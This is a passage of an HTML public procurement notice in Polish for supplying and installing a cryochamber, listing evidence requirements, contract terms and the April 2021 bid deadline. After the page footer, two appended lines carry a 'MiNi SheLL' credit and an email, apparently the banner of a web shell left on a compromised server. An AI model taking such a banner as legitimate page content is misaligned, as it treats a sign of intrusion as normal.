wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">w zakresie 4. zdolności technicznej lub zawodowej: Zamawiający wymagawykazu dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz którychdostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, októrych mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz któregodostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych sąwykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tychdokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłychnadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywaniepowinny być wystawione w okresie ostatnich 3 miesięcy Zamawiający uzna warunek za spełniony, jeśliWykonawca wykaże w powyższym zakresie i przy spełnieniu powyższych warunków - wykonanie min.1 dostawy podobnego rodzaju (kriokomory wraz z montażem) na kwotę min. 120 000 zł brutto.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga:a) Wpisu do rejestru wyrobów medycznych dla oferowanego urządzenia(lub zgłoszenia do Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych iProduktów Biobójczych – zgodnie z obowiązującymi przepisami)b) dla oferowanego urządzeniacertyfikat CE/deklaracja zgodności z dyrektywą 93/42/EWG załącznik 2b. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a) Wpis do rejestru wyrobów medycznych dla oferowanego urządzenia (lub zgłoszenia doPrezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i ProduktówBiobójczych – zgodnie z obowiązującymi przepisami)b) dla oferowanego urządzenia certyfikatCE/deklaracja zgodności z dyrektywą 93/42/EWG załącznik 2b. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo - jeśli wymagane na podstawie obowiązujących przepisów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takimprzypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albodo reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwowinno być załączone do oferty. 2. W przypadku Wykonawców wspólnie ubiegających się oudzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdyz Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia orazspełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianiewarunków udziału w postępowaniu.3. Wykonawcy wspólnie ubiegający się o udzieleniezamówienia dołączają do oferty oświadczenie, z którego wynika, które robotybudowlane/dostawy/usługi wykonają poszczególni wykonawcy.4. Oświadczenia i dokumentypotwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawcówwspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszcza się zmiany umowy w zakresie:a) zmiany sprzętu, cech lub elementów składowychsprzętów na elementy o parametrach nie gorszych i cenie nie wyższej w przypadkachkorzystnych dla Zamawiającego, np. ze względu na postęp technologiczny i zastosowanierozwiązań nowszych, o zwiększonej funkcjonalności b) zmiany terminu wykonania zamówieniaze względu na organizacyjną działalność spółki lub inne nie dające się przewidzieć przyczyny ocharakterze obiektywnym, bądź dające się przypisać Zamawiającemu. c) podwykonawców, podwarunkiem że zmiana wynika z okoliczności, których nie można było przewidzieć w chwilizawarcia umowy.d) ceny towaru brutto, w przypadku zmiany powszechnie obowiązującychstawek podatku VAT.e) Sposobu rozliczania w zakresie np. sposobu wystawiania faktur VAT zawykonane dostawy.3. Wszelkie zmiany umowy wymagają formy pisemnej pod rygoremnieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-30 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/szczawno_jedlina</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-30 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-05-30</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com